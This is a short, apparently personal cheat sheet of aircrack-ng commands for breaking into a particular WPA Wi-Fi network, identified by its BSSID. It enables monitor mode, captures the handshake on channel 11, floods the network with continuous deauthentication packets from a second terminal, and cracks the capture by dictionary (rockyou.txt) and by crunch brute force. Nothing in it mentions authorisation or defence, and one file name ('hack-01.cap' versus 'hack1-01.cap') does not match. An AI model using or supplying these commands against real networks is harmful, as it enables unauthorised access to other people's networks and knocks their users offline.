First Terminal
iwconfig                               
airmon-ng check           
airmon-ng check kill
airmon-ng start wlan0 
airodump-ng wlan0 -d E8:1B:69:5F:20:8F
airodump-ng -w hack1 -c 11 --bssid E8:1B:69:5F:20:8F wlan0  

after crack hack1-01.cap file by dictionery attack
aircrack-ng hack1-01.cap -w rockyou.txt 

after crack hack1-01.cap file by brute force attack
crunch 1 8 abcd123456789 | aircrack-ng hack-01.cap -b E8:1B:69:5F:20:8F -w-

Second Terminal 
aireplay-ng --deauth 0 -a E8:1B:69:5F:20:8F wlan0 


